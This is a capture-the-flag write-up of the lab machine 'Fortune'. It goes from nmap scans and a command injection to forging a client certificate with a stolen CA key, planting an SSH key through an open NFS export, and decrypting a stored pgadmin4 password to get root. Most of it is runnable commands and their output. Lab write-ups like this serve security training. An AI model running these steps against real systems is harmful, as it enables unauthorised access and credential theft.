From nmap ports 22
, 80
, 443
are open
root@kali:~# nmap -sC -sV 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-14 22:07 EEST
Nmap scan report for 10.10.10.127
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
| 256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_ 256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp open http OpenBSD httpd
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
The db
parameter is vulnerable to command injection, by adding ;{command} to the parameter db
.
Reverse shell isn't possible from here.
Two juicy files are located at /home/bob/ca/intermediate/certs/intermediate.cert.pem
and /home/bob/ca/intermediate/private/intermediate.key.pem
. The first file is a certification file which includes the public certification of a website. And the second one is the private key of that. Having those files I created a pk12 certification.
root@kali:~# openssl req -newkey rsa:4096 -keyout alice_key.pem -out alice_csr.pem -nodes -days 365 -subj "/CN=Alice"
root@kali:~# openssl x509 -req -in alice_csr.pem -CA intermediate.cert.pem -CAkey intermediate.key.pem -out alice_cert.pem -set_serial 01 -days 365
root@kali:~# openssl pkcs12 -export -clcerts -in intermediate.cert.pem -inkey intermediate.key.pem -out alice.p12
At first it gives an error, but after importing the alice.p12 there is some progress. Click generate and
Using the private key to access the ssh port as nfsuser(found inside /etc/passwd)
root@kali:~# chmod 600 priv.key root@kali:~# ssh -i nfsuser.priv nfsuser@10.10.10.127
Port 2049
is open now
root@kali:~# nmap 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-15 00:41 EEST
Nmap scan report for 10.10.10.127
Host is up (0.11s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
1947/tcp filtered sentinelsrm
2049/tcp open nfs
6668/tcp filtered irc
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
root@kali:# showmount -e 10.10.10.127
Export list for 10.10.10.127:
/home (everyone)
Mounting /home folder
root@kali:# mkdir /tmp/home/ && mount 10.10.10.127:/home/ /tmp/home/
Having rw permissions to charlie folder, I upload my private ssh key and get ssh access as charlie user.
root@kali:/tmp/home# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/fuxsocy/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/fuxsocy/.ssh/id_rsa.
Your public key has been saved in /home/fuxsocy/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:fW1/G5sQAc0x4l/0A/0MlkaH1X1bkLxfyHZETD7c76o root@kali
The key's randomart image is:
+---[RSA 2048]----+
| oo*=@B|
| . oo&+X|
| . = @O|
| . ..B.O|
| S . .+ooo|
| . ..o.|
| . .+|
| ..*|
| E..+ |
+----[SHA256]-----+
root@kali:# cat /home/fuxsocy/.ssh/id_rsa.pub >> /tmp/home/charlie/.ssh/authorized_keys
root@kali:# ssh -i /home/fuxsocy/.ssh/id_rsa charlie@10.10.10.127
Last login: Tue May 14 16:52:51 2019 from 10.10.16.86
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
fortune$
A file called mbox contains
fortune$ cat mbox
From bob@fortune.htb Sat Nov 3 11:18:51 2018
Return-Path: <bob@fortune.htb>
Delivered-To: charlie@fortune.htb
Received: from localhost (fortune.htb [local])
by fortune.htb (OpenSMTPD) with ESMTPA id bf12aa53
for <charlie@fortune.htb>;
Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
From: <bob@fortune.htb>
Date: Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
To: charlie@fortune.htb
Subject: pgadmin4
Message-ID: <196699abe1fed384@fortune.htb>
Status: RO
Hi Charlie,
Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.
Cheers,
Bob
fortune$
On /var/appsrv/pgadmin4/ is a file pgadmin4.db
which has An enrypted string {utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz} and an encrypted key. {$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg}
Adding print decrypt("utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz","$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg")
at the end of the file crypto.py
file located at /usr/local/pgadmin4/pgadmin4-3.4/web/pgadmin/utils/crypto.py
we can decrypt the the encrypted string.
root@kali:# python crypto.py
R3us3-0f-a-P4ssw0rdl1k3th1s?_B4D.ID3A!
None
fortune$ su -
Password:
fortune#
fortune# cat /home/charlie/user.txt
ada0a[redacted]
fortune# cat /root/root.txt
335af[redacted]
fortune#